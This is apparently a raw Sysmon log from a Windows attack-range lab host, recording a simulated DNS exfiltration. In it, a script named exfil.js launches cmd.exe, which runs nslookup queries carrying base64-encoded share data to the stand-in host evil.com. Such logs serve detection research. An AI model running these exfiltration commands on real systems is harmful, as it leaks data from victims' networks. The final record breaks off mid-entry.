14:21:35.328{2E1864BB-18EF-629A-2C44-000000005F02}54845272C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-2E44-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.335{2E1864BB-18EF-629A-2E44-000000005F02}5404C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-2C44-000000005F02}5484C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nligdn.tmp 2>&1 10341000x8000000000000000210282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.312{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-2D44-000000005F02}1384C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.312{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-2D44-000000005F02}1384C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.297{2E1864BB-18EF-629A-2D44-000000005F02}13845628C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2C44-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.297{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2D44-000000005F02}1384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.297{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.281{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2C44-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.281{2E1864BB-18E0-629A-6742-000000005F02}39766260C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-2C44-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.296{2E1864BB-18EF-629A-2C44-000000005F02}5484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nligdn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000210271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.281{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfbd.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000210270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.259{2E1864BB-18EF-629A-2A44-000000005F02}4052388C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2B44-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.259{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2B44-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.259{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.259{2E1864BB-18EF-629A-2944-000000005F02}79484848C:\Windows\system32\cmd.exe{2E1864BB-18EF-629A-2B44-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000210263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.263{2E1864BB-18EF-629A-2B44-000000005F02}5552C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EF-629A-2944-000000005F02}7948C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfbd.tmp 2>&1 10341000x8000000000000000210262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.244{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-2A44-000000005F02}4052C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.244{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EF-629A-2A44-000000005F02}4052C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.228{2E1864BB-18EF-629A-2A44-000000005F02}4052388C:\Windows\system32\conhost.exe{2E1864BB-18EF-629A-2944-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.228{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2A44-000000005F02}4052C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.212{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EF-629A-2944-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000210257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.212{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.212{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.212{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.212{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:35.212{2E1864BB-18E0-629A-6742-000000005F02}39761096C:\Windows\System32\WScript.exe{2E1864BB-18EF-629A-2944-000000005F02}7948C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C